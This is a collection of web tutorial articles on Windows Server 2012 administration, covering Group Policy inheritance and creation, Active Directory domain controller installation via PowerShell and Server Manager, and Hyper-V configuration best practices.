GPOs can be linked at Site, Domain, OUs and child OUs. By default, group policy settings that are linked to parent objects are inherited to the child objects in the active directory hierarchy. By default, Default Domain Policy is linked to the domain and is inherited to all the child objects of the domain hierarchy.

GPO inheritance let’s administrators to set common set of policies to the domain level or site level and configure more specific polices at the OU level. GPOs inherited from parent objects are processed before GPOs linked to the object itself.

 

As shown in the figure below, the Default Doman Policy GPO with precedence 2 will be processed first, because the Default Domain Policy is applied at the domain level (firewall.local) where as the WallPaper GPO is applied at the organization unit level:

windows-2012-group-policy-enforcement-1Figure 1. Group Policy Inheritance

Block Inheritance

As GPOs can be inherited by default, they can also be blocked, if required using the Block Inheritance. If the Block Inheritance setting is enabled, the inheritance of group policy setting is blocked. This setting is mostly used when the OU contains users or computers that require different settings than what is applied to the domain level.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

As shown in the figure below, to configure blocking of GPO inheritance, right-click the OU container and select the Block Inheritance option from the list:

         Figure 2. GPO Block Inheritance

Enforced (No Override)

This option prevents a GPO from being overridden by other GPO. For example, if you apply a GPO to domain and check the Enforced option, then this policy will be enforced to all the child objects in active directory and takes precedence of child GPO objects even if you have configured another similar GPO child object with a different value. In previous Windows Server versions, the GPO enforced option used to be called No Override.

To enable the GPO Enforced option, right-click on a particular GPO and click on the Enforced option:

windows-2012-group-policy-enforcement-3Figure 3. Enforcing a GPO

This article explained the importance of GPO inheritance and how it can be enforced or blocked via Group Policy Enforcement, Inheritance and Block Inheritance throughout the Active Directory. For more information on Group Policies and how they are created or applied, refer to our article Configuring Windows 2012 Active Directory Group Policies or visit our Windows 2012 Server Section.



  • Hits: 66984

Understanding, Creating, Configuring & Applying Windows Server 2012 Active Directory Group Policies

This article explains what Group Policies are and shows how to configure Windows Server 2012 Active Directory Group Policies. Our next article will cover how to properly enforce Group Policies (Group Policy Link Enforcement, Inheritance and Block Inheritance) on computers and users that a part of the company's Active Directory.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Before we dive into Group Policy configuration, let's explain what exactly Group Policies are and how they can help an administrator control its users and computers.

A Group Policy is a computer or user setting that can be configured by administrators to apply various computer specific or user specific registry settings to computers that have joined the domain (active directory). A simple example of a group policy is the user password expiration policy which forces users to change their password on a regular basis. Another example of a group policy would be the enforcement of a specific desktop background picture on every workstation or restricting users from accessing their Local Network Connection properties so they cannot change their IP address.

A Group Policy Object (GPO) contains one or more group policy settings that can be applied to domain computers, users, or both. GPO objects are stored in active directory. You can open and configure GPO objects by using the GPMC (Group Policy Management Console) in Windows Server 2012:

windows-2012-group-policies-1 Figure 1. GPO Objects

Group Policy Settings are the actual configuration settings that can be applied to a domain computer or user. Most of the settings have three states, Enabled, Disabled and Not Configured. Group Policy Management Editor provides access to hundreds of computer and user settings that can be applied to make many system changes to the desktop and server environment.

Group Policy Settings

Group Policy Settings are divided into Computer Settings and User Settings. Computer Settings are applied to computer when the system starts and this modifies the HKEY Local Machine hive of registry. User Settings are applied when the users log in to the computer and this modifies the HKEY Local Machine hive.

windows-2012-group-policies-2Figure 2. Group Policy Settings

Computer Settings and User Settings both have policies and preferences.

These policies are:

Software Settings: Software can be deployed to users or computer by the administrator. The software deployed to users will be available only to those specific users whereas software deployed to a computer will be available to any user that on the specific computer where the GPO is applied.

Windows Settings: Windows settings can be applied to a user or a computer in order to modify the windows environment. Examples are: password policies, firewall policy, account lockout policy, scripts and so on.  

Administrative Templates: Contains a number of user and computer settings that can be applied to control the windows environment of users or computers. For example, specifying the desktop wallpaper, disabling access to non-essential areas of the computers (e.g Network desktop icon, control panel etc), folder redirection and many more.

Preferences are a group policy extension that does the work which would otherwise require scripts. Preferences are used for both users and computers. You can use preferences to map network drives for users, map printers, configure internet options and more.

Next, let’s take a look at how we can create and apply a Group Policy.

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

Creating & Applying Group Policy Objects

By default, GPOs can be created and applied by Domain Admins, Enterprise Admins and Group Policy Creator Owner user groups. After creating the GPO, you can apply or link the GPOs to sites, domains or Organizational Units (OUs), however you cannot apply GPO to users, groups, or computers. GPOs are processed in following top to bottom order:

  1. Local Group Policy: Every windows operating system has local group policy installed by default. So this local group policy of the computer is applied at first.
  2. Site GPO: The GPOs linked to the Site is then processed. By default, there is no site level group policy configured.
  3. Domain GPO: Next, the GPO configured at domain level is processed. By default, GPO named default domain policy is applied at the domain level. This applies to all the objects of the domain. If there is policy conflict between domain and site level GPOs, then GPO applied to domain level takes the precedence.
  4. Organizational Unit GPO: - In the end, GPO configured at OU is applied. If there is any conflict between previously applied GPOs, the GPO applied to OU takes the most precedence over Domain, Site and Local Group Policy.

Let’s now take a look at a scenario to apply a group policy to domain joined computers to change the desktop background. We have a domain controller named FW-DC01 and two clients FW-CL1 and FW-CL2 as shown in the diagram below. The goal here is to set the desktop wallpaper for these two clients from a group policy:

windows-2012-group-policies-3Figure 3. GPO Scenario

In our earlier articles we showed how Windows 8 / Windows 8.1 join an Active Directory domain, FW-CL1 and FW-CL2 are workstations that have previously joined our domain – Active Directory. We have two users MJackson and PWall in the FW Users OU.

Open the Group Policy Management Console (GPMC) by going into Server Manager>Tools and select Group Policy Management as shown below:

windows-2012-group-policies-4Figure 4. Open GPMC

As the GPMC opens up, you will see the tree hierarchy of the domain. Now expand the domain, firewall.local in our case, and you will see the FW Users OU which is where our users reside. From here, right-click this OU and select the first option Create a GPO in this domain and Link it here:

windows-2012-group-policies-5Figure 5. Select FW Users and Create a GPO

Now type the Name for this GPO object and click the OK button. We selected WallPaper GPO:

windows-2012-group-policies-6Figure 6. Creating our Wallpaper Group Policy Object

Next, right-click the GPO object and click edit:

windows-2012-group-policies-7Figure 7. Editing a Group Policy Object

At this point we get to see and configure the policy that deals with the Desktop Wallpaper, however notice the number of different policies that allow us to configure and tweak various aspects of our domain users.

To find the Desktop Wallpaper, go to Expand User Configuration> Policies> Administrative Templates> Desktop> Desktop. At this point we should be able to see the setting in right window. Right-click the Desktop Wallpaper setting and select Edit:

windows-2012-group-policies-8Figure 8. Selecting and editing Desktop Wallpaper policy

The settings of Desktop Wallpaper will now open. First we need to activate the policy by selecting the Enabled option on the left. Next, type the UNC path of shared wallpaper. Remember that we must share the folder that contains the wallpaper \\FW-DC1\WallPaper\ and configure the share permission so that users can access it. Notice that we can even select to center our wallpaper (Wallpaper Style). When ready click Apply and then OK:

windows-2012-group-policies-9Figure 9. Configure Desktop Wallpaper

Now that we’ve configured our GPO, we need to apply it. To do so, we can simply log off and log back in the client computer or type following command in domain controller’s command prompt to apply the settings immediately:

C:\> gpupdate /force

Once our domain user logs in to their computer (FW-CL1), the new wallpaper policy will be applied and loaded on to the computer’s desktop.

windows-2012-group-policies-10Figure 10. User Login

As we can see below, our user's desktop now has the background image configured in the group policy we created:

windows-2012-group-policies-11Figure 11. Computer Desktop Wallpaper Changed

This example shows how one small configuration setting can be applied to all computers inside an organization. The power and flexibility of Group Policy Objects is truly unbelievable and as we’ve shown, it’s even easier to configure and apply them with just a few clicks on the domain controller!

FREE Hyper-V & VMware Backup: Easy to use - Powerful features - Just works, no hassle: It's FREE for Firewall.cx readers! Download Now!

This article explained what Group Policies Objects are and showed how to Configure Windows 2012 Active Directory Group Policies to control our Active Directory users and computers. We also highly recommend our article on Group Policy Enforcement, Inheritance throughout the Active Directory structure. More articles on Windows 2012 & Hyper-V can be found at our Windows 2012 Server section.

 

  • Hits: 49127

Installing Active Directory Services & Domain Controller via Windows PowerShell. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

Our previous article covered the installation of Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) interface.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

What Is Active Directory?

Active Directory is a heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is central repository of active directory objects like user accounts, computer accounts, groups, group policies and so on. Similarly, Active Directory authenticates user accounts and computer accounts when they login into the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - Forest is a collection of Domains that share common Active Directory database. The first Domain in a Forest is called a Forest Root Domain.
  5. Tree: - A tree is a collection of domain names that share common root domain.
  6. Schema: - Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply container or folders in the Active Directory that stores other active directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory object that represent physical locations. Sites are configured for proper replication of Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Checking Active Directory Domain Services Role Availability 

Another method of installing an Active Directory Services Role &  Domain Controller is with the use of Windows PowerShell. PowerShell is a powerful scripting tool and an alternative to the Windows GUI wizard we covered in our previous article. Open PowerShell as an Administrator and type the following cmdlet to check for the Active Directory Domain Services Role availability:

PS C:\Users\Administrator> Get-WindowsFeature AD-Domain-Services

The system should return the Install State as Available, indicating the role is available for immediate installation. We can now safely proceed to the next step.

Install Active Directory Services Role & Domain Controller Using Windows PowerShell

To initiate the installation of Active Directory Services Role on Windows Server 2012 R2, issue the following cmdlet:

PS C:\Users\Administrator> Install-WindowsFeature –Name AD-Domain-Services

The system will immediately begin the installation of the Active Directory Domain Services role and provide an update of the installation's progress:

windows-2012-active-directory-powershell-1

Figure 1. Installing Active Directory Domain Services with PowerShell

Once the installation is complete, the prompt is updated with a success message (Exit Code) as shown below:

windows-2012-active-directory-powershell-2

Figure 2. Finished Installing ADDS with PowerShell

Next step is to promote the server to an active directory domain controller. To do so, you need to perform the prerequisite installation at the forest level by typing the following cmdlet in PowerShell:

PS C:\Users\Administrator> Test-ADDSForestInstallation

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-3

Figure 3. Prerequisite Installation

Now it's time to promote the server to a domain controller. For this step, we need to save all parameters in a PowerShell script (using notepad), which will then be used during the domain controller installation.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Below are the options we used - these are identical to what we selected in our GUI Wizard installation covered in our Windows Server 2012 Active Directory Services role and Domain Controller installation using the Windows Server Manager (GUI) article:

#
# Windows PowerShell script for AD DS Deployment
#
Import-Module ADDSDeployment
Install-ADDSForest
-CreateDnsDelegation:$false
-DatabasePath "C:\Windows\NTDS"
-DomainMode "Win2012R2"
-DomainName "firewall.local"
-DomainNetbiosName "FIREWALL"
-ForestMode "Win2012R2"
-InstallDns:$true
-LogPath "C:\Windows\NTDS"
-NoRebootOnCompletion:$false
-SysvolPath "C:\Windows\SYSVOL"
-Force:$true

Save the script at an easy accessible location e.g Desktop, with the name InstallDC.ps1.

Before running the script, we need to change the execution policy of PowerShell to remote signed. This is accomplished with the following cmdlet:
PS C:\Users\Administrator\Desktop> Set-executionpolicy remotesigned

The following figure shows the command execution and system output:

windows-2012-active-directory-powershell-4

Figure 4. Changing the Execution Policy of PowerShell

Now we can execute our script from within PowerShell by changing the PowerShell directory to the location where the script resides and typing the following cmdlet:

PS C:\Users\Administrator\Desktop> .\InstallDC.ps1

Once executed, the server is promoted to Domain Controller and installation updates are provided at the PowerShell prompt:

windows-2012-active-directory-powershell-4

Figure 5. Promoting Server to Domain Controller

After the installation is complete, the server will reboot and the server will have Active Directory Domain Services installed with the server being a Domain Controller.

This completes the installation and setup of Windows 2012 Active Directory Services Role & Domain Controller using Windows 2012 PowerShell.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

  • Hits: 20460

Installing Windows Server 2012 Active Directory via Server Manager. Active Directory Concepts

This article serves as an Active Directory tutorial covering installation and setup of a Windows 2012 Domain Controller using Windows Server Manager (GUI).

Readers interested in performing the installation via Windows PowerShell can read this article.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

What is Active Directory?

Active Directory is a heart of Windows Server operating systems. Active Directory Domain Services (AD DS) is a central repository of active directory objects such as user accounts, computer accounts, groups, group policies and so on. Similarly, Active Directory authenticates user accounts and computer accounts when they login into the domain. Computers must be joined to the domain in order to authenticate Active Directory users.

Active Directory is a database that is made up of several components which are important for us to understand before attempting to install and configure Active Directory Services on Windows Server 2012. These components are:

  1. Domain Controller (DC): - Domain Controllers are servers where the Active Directory Domain Services role is installed. The DC stores copies of the Active Directory Database (NTDS.DIT) and SYSVOL (System Volume) folder.
  2. Data Store: - It is the actual file (NTDS.DIT) that stores the Active Directory information.
  3. Domain: - Active Directory Domain is a group of computers and user accounts that share common administration within a central Active Directory database.
  4. Forest: - Forest is a collection of Domains that share common Active Directory database. The first Domain in a Forest is called a Forest Root Domain.
  5. Tree: - A tree is a collection of domain names that share common root domain.
  6. Schema: - Schema defines the list of attributes and object types that all objects in the Active Directory database can have.
  7. Organizational Units (OUs): - OUs are simply container or folders in the Active Directory that stores other active directory objects such as user accounts, computer accounts and so on. OUs are also used to delegate control and apply group policies.
  8. Sites: - Sites are Active Directory object that represent physical locations. Sites are configured for proper replication of Active Directory database between sites.
  9. Partition: - Active Directory database file is made up of multiple partitions which are also called naming contexts. The Active Directory database consists of partitions such as application, schema, configuration, domain and global catalog.

Installing Active Directory Domain Controller In Server 2012

In Windows Server 2012, the Active Directory Domain Controller role can be installed using the Server Manager or alternatively, using Windows PowerShell. The figure below represents our lab setup which includes a Windows Server 2012 (FW-DC01) waiting to have the Active Directory Domain Services server role installed on it:

windows-2012-active-directory-installation-1

Notice that there are two Windows 8 clients waiting to join the Active Directory domain once installed.

A checklist before installing a Domain Controller in your network is always recommended. The list should include the following information:

  • Server Host Name – A valid Hostname or Computer Name must be assigned to domain controller. We've selected FW-DC01 as a server's host name.
  • IP Address – You should configure a static IP address, which will not be changed later on. In our example, we've used 192.168.1.1/24 which is a Class C IP address.
  • Domain Name – Perhaps one of the most important items on our checklist. We've used firewall.local for our setup. While many will want to use an existing public domain, e.g their company's domain, it is highly recommended this practice is avoided at all costs as it can create a number of problems with DNS resolution when internal hosts or servers are trying to resolve hosts that exist on both private and public name spaces.

Microsoft doesn't recommend the usage of a public domain name in an internal domain controller, which is why we selected firewall.local instead of firewall.cx.

Installing Active Directory Domain Controller Using Server Manager

Initiating the installation of Active Directory is a simple process; however it does require Administrator privileges. Open Server Manager, go to Manage and select Add Roles and Features:

Figure 2. Add Roles and Features

Click Next on the Before you begin page.

On the next screen, choose Role-based or feature-based Installation and click Next:

windows-2012-active-directory-installation-3

 Figure 3. Choose Role Based Installation

Select the destination server by choosing Select a server from the server pool option and select the server and click Next. In cases like our lab where there is only one server available, it must be selected:

windows-2012-active-directory-installation-4

 Figure 4. Select Destination Server

In the Select server roles page, select the Active Directory Domain Services role and click Next:

windows-2012-active-directory-installation-5

Figure 5. Select AD DS role

The next page is the Features page which we can safely skip by clicking Next

The Active Directory Domain Services page contains limited information on requirements and best practices for Active Directory Domain Services:

windows-2012-active-directory-installation-6

Figure 6. AD DS Page

Once you've read the information provided, click Next to proceed to the final confirmation page.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

On the confirmation page, select Restart the destination server automatically if required and click on the Install button. By clicking Install, you confirm you are ready to begin the AD DS role installation:

windows-2012-active-directory-installation-7

Figure 7. AD DS Confirmation

Note: You cannot cancel a role installation once it begins

The Add Roles and Feature Wizard will continuously provide updates during the Active Directory Domain Services role installation, as shown below:

windows-2012-active-directory-installation-8

Figure 8. Installation Progress

Once the installation has completed successfully, we should expect to see the Installation succeeded message under the installation progress bar:

windows-2012-active-directory-installation-9

Figure 9. Successful Installation & Promote Server to DC

Promoting Server To Domain Controller

At this point we can choose to Promote this server to a domain controller by clicking on the appropriate link as highlighted above (Blue arrow).

After selecting the Promote this server to a domain controller option, the Deployment Configuration page will appear. Assuming this is the first domain controller in the network, as is in our case, select the Add a new forest option to setup a new forest, and then type the fully qualified domain name under root domain name section. We've selected to use firewall.local:

windows-2012-active-directory-installation-10

Figure 10. Configure Domain Name

Administrators who already have active directory installed would most likely select the Add a domain controller to an existing domain option. Having at least two Domain Controllers is highly advisable for redundancy purposes. When done click the Next button.

Now select Windows Server 2012 R2 for the Forest functional level and Domain functional level. By setting the domain and forest functional levels to the highest value that your environment can support, you'll be able to use as many Active Directory Domain Services as possible. If for example you do not plan to ever add domain controllers running Windows 2003, but might add a Windows 2008 server as a domain controller, you would select Windows Server 2008 for the Domain functional level. Next, click on the Domain Name System (DNS) server option as shown in the below figure:

windows-2012-active-directory-installation-11

Figure 11. DC Capabilities

The DNS Server role can be later on installed. If for any reason you need to install the DNS Server role later on, please read our How to Install and Configure Windows 2012 DNS Server Role article.

Since this is the first domain controller in the forest, Global Catalog (GC) will be selected by default. Now set the Directory Services Restore Mode (DSRM) password. DSRM is used to restore active directory in case of failure. Once done, click Next.

The next window is the DNS Options page. Here we might encounter the following error which can be safely ignored simply because of the absence of a DNS server (which we are about to install):

A delegation for this DNS server cannot be created because the authoritative parent zone cannot be found...

Ignore the error and click Next to continue.

In the next window, Additional Options, leave the default NetBIOS domain name and click Next. The Windows AD DS wizard will automatically remove the .local from the domain name to ensure compatibility with NetBIOS name resolution:

windows-2012-active-directory-installation-12

Figure 12. Additional Options

The next step involves the Paths selection which allows the selection of where to install the Database, Log Files and SYSVOL folders. You can either browse to a different location or leave the default settings (as we did). When complete, click Next:

windows-2012-active-directory-installation-13

Figure 13. Paths

Note: When the installation is complete, the Database folder will contain a file named NTDS.DIT. This important file is database file of your active directory.

Finally, the next screen allows us to perform a quick review of all selected options before initiating the installation: Once reviewed, click Next.

windows-2012-active-directory-installation-14

Figure 14. Review Options

The server will now perform some prerequisites check. If successful, it will show green check mark on the top. Some warnings may appear, however if these are non-critical, we can still proceed with the installation. Click the Install button to promote this server to domain controller:

windows-2012-active-directory-installation-15

Figure 15. Prerequisites Check

The installation begins and the server's installation progress is continuously updated:

windows-2012-active-directory-installation-16

Figure 16. Installation Begins

When the installation of Active Directory is complete, the server will restart.

Assuming we've restarted, we can now open Active Directory Users and Computers and begin creating user accounts, computer accounts, apply group policies, and so on.

windows-2012-active-directory-installation-17

Figure 17. Active Directory Users and Computers

As expected, under the Domain Controllers section, we found our single domain controller. If we were to add our new domain controller to an existing active directory, then we would expect to find all domain controllers listed here.

FREE Hyper-V & VMware Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

  • Hits: 32007

Hyper-V Best Practices - Replica, Cluster, Backup Advice

hyper-v-best-practices-1aHyper-V has proven to be a very cost effective solution for server consolidation. Evidence of this is also the fact that companies are beginning to move from VMware to the Hyper-V virtualization platform. This article will cover the Windows 2012 Hyper-V best practices, and aims to help you run your Hyper-V virtualization environment as optimum as possible.

Keeping your Hyper-V virtualization infrastructure running as smoothly as possible can be a daunting task, which is why we recommend engineers follow the best Hyper-V practices.

Different organizations have different setups and requirements: some of you might be moving from VMware to Hyper-V virtualization, while others might be upgrading from an older Hyper-V virtualization server to a newer one. Each scenario must follow the baseline or best practices,  to be able to run the virtualization infrastructure successfully – without problems.

FREE Hyper-V Backup:  Easy to use - Powerful features - Just works, no hassle:   It's FREE for Firewall.cx readers!  Download Now!

Hyper-V Best Practice List

Best practices for Hyper-V vary considerably depending on whether you're using clustered servers. As a general rule-of-thumb the best thing you can do is try to configure your host server and your Virtual Machines in a way that avoids resource contention to the greatest extent possible.

Organizations who are considering migrating their infrastructure to Hyper-V, or are currently running on the Hyper-V virtualization platform, need to take note of the below important points that must not be overlooked:

Processor

Minimum: A 1.4 GHz 64-bit processor with hardware-assisted virtualization. This feature is available in processors that include a virtualization option—specifically, processors with Intel Virtualization Technology (Intel VT) or AMD Virtualization (AMD-V) technology.
Hardware-enforced Data Execution Prevention (DEP) must also be available and enabled. For Intel CPUs, this translates to enabling the Intel XD (“execute disable”) bit or while for AMD CPUs, the AMD NX (“no execute”) bit.

Memory

Minimum: 512 MB.  This is the bare minimum; however a logical approach would be at least 4 Gigs of RAM per virtual server.  If one physical server is to host 4 Virtual Machines, then we would recommend at least 16GBs of Physical RAM, if not more.  SQL servers and other RAM intensive services would certainly lift the memory requirements a lot higher. You can never have enough memory.

Network Adapters

At least one network adapter is required, but two or more are always recommended. Hyper-V allows the creation of three different virtual switches: Internal Virtual Switches, Private Virtual Switches and External Virtual Switches.

Internal virtual switches are used to allow the virtual machine to connect with its host machine (the physical machine that run’s Hyper-V). Private virtual switches are used when we only want to connect virtual machines, which run on the same host, between each other.  External virtual switches are used to allow the virtual machine to connect with our LAN network and this is where physical network adapters come in hand.   
Host machines with only one network adapter will be forced to share that network adapter with all its virtual machines. This is why it’s always best practice to have at least two network adapters available. 

Additional Considerations

The settings for hardware-assisted virtualization and hardware-enforced DEP are usually available from within in the system’s BIOS; however, the names of the settings may differ from the names identified previously.
For more information about whether a specific processor model supports Hyper-V (virtualization), it is recommended to check at the manufacturer’s website.

As noted before, it is important to remember after modifying the settings for hardware-assisted virtualization or hardware-enforced DEP, you may need to turn off the power to the server and then turn it back on to ensure the new CPU settings are loaded.

Microsoft Assessment & Planning Toolkit

Microsoft Assessment and Planning Toolkit (MAP) can be used to study existing infrastructure and determine the Hyper-V requirement. For organizations who are interested in server consolidation and virtualization through technologies such as Hyper-V, MAP helps gather performance metrics and generate server consolidation recommendations that identify the candidates for server virtualization and will even suggest how the physical servers might be placed in a virtualized environment.

The diagram below shows the MAP phases involved to successfully create the necessary reports:

hyper-v-best-practices-1

Figure 1. MAP Phases

Below is an overview of the Microsoft Assessment and Planning Toolkit application:

hyper-v-best-practices-2

Figure 2. MAP Overview

The following points are the best practices which should be considered before deploying your Windows Server 2012 Hyper-V infrastructure:

Hyper-V Hosts (Physical Servers)

  • Ensure hosts are up-to-date with recommended Microsoft updates
  • Ensure hosts have the latest BIOS version, as well as other hardware devices (such as Synthetic Fiber Channel, NIC’s, Raid bios, etc.)
  • Hosts must be part of a domain before you can create a Hyper-V High-Availability Cluster.
  • RDP Printer Mapping should be disabled on hosts, to remove any chance of a printer driver causing instability issues on the host machine. To do this, follow the below steps: Computer Configuration –> Policies –> Administrative Templates –> Windows Components –> Remote Desktop Services –> Remote Desktop Session Host –> Printer Redirection –> Do not allow client printer redirection –> Set to "Enabled”
  • Do not install any other Roles on a host besides the Hyper-V role and the Remote Desktop Services roles. Optionally, if the host will become part of a cluster, you can install Failover Cluster Manager. In the event the host connects to an iSCSI SAN and/or Fiber Channel, you can also install Multipath I/O.
  • Anti-virus software should exclude Hyper-V specific files using the Hyper-V: Antivirus Exclusions for Hyper-V Hosts article available from Microsoft.
  • Default path for Virtual Hard Disks (VHD/VHDX) should be set to a non-system drive, due to this can cause disk latency as well as create the potential for the host running out of disk space.
  • If you are using iSCSI: In Windows Firewall with Advanced Security, enable iSCSI Service (TCP-In) for Inbound and iSCSI Service (TCP-Out) for outbound in Firewall settings on each host. This will ensure iSCSI traffic is allowed to pass from host to the SAN device and back. Not enabling these rules will prevent iSCSI communication. To set the iSCSI firewall rules via netsh, you can use the following command:

PS C:\Windows\system32> Netsh advfirewall firewall set rule group=”iSCSI Service” new enable=yes

  • Periodically run performance counters against the host, to ensure optimal performance. Recommend using the Hyper-V performance counter that can be extracted from the (free) Codeplex PAL application.

Hyper-V Virtual Machines

  • Ensure you are running only supported guests in your environment.
  • Ensure you are using sophisticated backup software such as Altaro’s Hyper-V Backup which also includes free lifetime backup for a specific amount of VMs
  • If you are converting VMware virtual machines to Hyper-V, consider using MVMC (a free, stand-alone tool offered by Microsoft) or VMM.
  • Disk2vhd is a Tool which can be used to convert a Physical Machine to a Hyper-V Virtual Machine (P2V). The VHD file created can then be imported in to Hyper-V.
FREE Hyper-V Backup:  FREE for Firewall.cx readers for a Limited Time!  Download Now!

Hyper-V Physical NICs

  • Ensure Network Adapters have the latest firmware and drivers, which often address known issues with hardware and performance.
  • TCP Chimney Offload is not supported with Server 2012 software-based NIC teaming, because TCP Chimney has the entire networking stack offloaded to the NIC. If however software-based NIC teaming is not used, you can leave TCP Chimney Offload enabled. To disable TCP Chimney Offload, from an elevated command-prompt, type the following command:

PS C:\Windows\system32> netsh int tcp set global chimney=disabled

  • Jumbo frames should be turned on and set for 9000 or 9014 (depending on your hardware) for CSV, iSCSI and Live Migration networks. To verify Jumbo frames have been successfully configured, run the following command from all your Hyper-V host(s) to your iSCSI SAN:

PS C:\Windows\system32> ping 10.50.2.35 –f –l 8000

This command will ping the SAN (e.g. 10.50.2.35) with an 8K packet from the host. If replies are received, Jumbo frames are properly configured. Note that in the case a network switch exists between the host and iSCSI SAN, Jumbo frames must be enabled on that as well.

hyper-v-best-practices-3

 Figure 3. Jumbo Frame Ping Test

  • Management NIC should be at the top (1st) in NIC Binding Order. To set the NIC binding order: Control Panel --> Network and Internet --> Network Connections. Next, select the advanced menu item, and select Advanced Settings. In the Advanced Settings window, select your management network under Connections and use the arrows on the right to move it to the top of the list.
  • If using NIC teaming inside a guest VM, follow this order: Open the settings of the Virtual Machine, Under Network Adapter, select Advanced Features, in the right pane, under Network Teaming, tick the “Enable this network adapter to be part of a team in the guest operating system”. Once inside the VM, open Server Manager. In the All Servers view, enable NIC Teaming from Server:

hyper-v-best-practices-4

Figure 4. Enable NIC Teaming

Hyper-V Disks

  • New disks should use the VHDX format. Disks created in earlier Hyper-V iterations should be converted to VHDX, unless there is a need to move the VHD back to a 2008 Hyper-V host.
  • Disk used for CSV must be partitioned with NTFS. You cannot use a disk for a CSV that is formatted with FAT, FAT32, or Resilient File System (ReFS).
  • Disks should be fixed in a production environment, to increase disk throughput. Differencing and Dynamic disks are not recommended for production, due to increased disk read/write latency times (differencing/dynamic disks).
  • Shared Virtual Hard Disk: Do not use a shared VHDx file for the operating system disk. Servers should have a unique VHDx (for the OS) that only they can access. Shared Virtual Hard Disks are better used as data disks and for the disk witness.
  • Use caution when using snapshots. If not properly managed, snapshots can cause disk space issues, as well as additional physical I/O overhead.
  • Page file on Hyper-V Host should manage by the OS and not configured manually.
  • It is not supported to create a storage pool using Fiber Channel or iSCSI LUNs.

Hyper-V Memory

  • Use Dynamic Memory on all VMs (unless not supported).
  • Guest OS should be configured with (minimum) recommended memory

Hyper-V Clusters

  • Set preferred network for CSV communication, to ensure the correct network is used for this traffic. The lowest metric in the output generated by the PowerShell command below, will be used for CSV traffic. First, open a PowerShell command-prompt (using “Run as administrator”) Secondly, you’ll need to import the “FailoverClusters” module. Type the following at the PowerShell command-prompt:

PS C:\Windows\system32> Import-Module FailoverClusters

Next, we’ll request a listing of networks used by the host, as well as the metric assigned. This can be done by typing the following:

PS C:\Windows\system32> Get-ClusterNetwork | ft Name, Metric, AutoMetric, Role

In order to change which network interface is used for CSV traffic, use the following PowerShell command:

PS C:\Windows\system32> (Get-ClusterNetwork "CSV Network").Metric=900

This will set the network named "CSV Network" to 900

hyper-v-best-practices-5

Figure 5. Get Cluster Network

  • Set preferred network for Live Migration, to ensure the correct network(s) are used for this traffic following these steps: Open Failover Cluster Manager, Expand the Cluster , Next, right-click on Networks and select Live Migration Settings , Use the Up/Down buttons to list the networks in order from most preferred (at the top) to least preferred (at the bottom) , Uncheck any networks you do not want used for Live Migration traffic , Select Apply and then press OK , Once you have made this change, it will be used for all VMs in the cluster
  • The Host Shutdown Time (ShutdownTimeoutInMinutes registry entry) can be increased from the default time. This setting is usually increased when additional time is needed by VMs in order to ensure they have had enough time to shut down before the host reboots.

Registry Key: HKLM\Cluster\ShutdownTimeoutInMinutes 

Enter minutes in Decimal value.

Note: Changing of this registy value requires a server reboot in order to take effect:

hyper-v-best-practices-6

Figure 6. Registry Shutdown Option

  • Run the Cluster Validation periodically to remediate any issues

Hyper-V Replica

  • Run the Hyper-V Replica Capacity Planner. The Capacity Planner for Hyper-V Replica, allows you to plan your Hyper-V Replica deployment based on the workload, storage, network and server characteristics.
  • Update inbound traffic on the firewall to allowTCP port 80 and/or port 443 traffic. (In Windows Firewall, enable “Hyper-V Replica HTTP Listener (TCP-In)” rule on each node of the cluster. Shell commands to achieve the above are:

PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTP" new enable=yes
PS C:\Windows\system32> netsh advfirewall firewall set rule group="Hyper-V Replica HTTPS" new enable=yes

  • Virtual hard disks with paging files should be excluded from replication, unless the page file is on the OS disk.
  • Test failovers should be performed monthly, at a minimum, to verify that failover will succeed and that virtual machine workloads will operate as expected after failover

Hyper-V Cluster-Aware Updating

  • Place all Cluster-Aware Updating (CAU) Run Profiles on a single File Share accessible to all potential CAU Update Coordinators. Run Profiles are configuration settings that can be saved as an XML file called an Updating Run Profile and reused for later Updating Runs.

Hyper-V SMB 3.0 File Shares

  • An Active Directory infrastructure is required, so you can grant permissions to the computer account of the Hyper-V hosts.
  • Loopback configurations (where the computer that is running Hyper-V is used as the file server for virtual machine storage) are not supported. Similarly, running the file share in VM’s that are hosted on computer nodes that will serve other VM’s is not supported.

Hyper-V Integration Services

  • Ensure Integration Services (IS) have been installed on all VMs. IC's significantly improve interaction between the VM and the physical host.

Hyper-V Offloaded Data Transfer (ODX) Usage

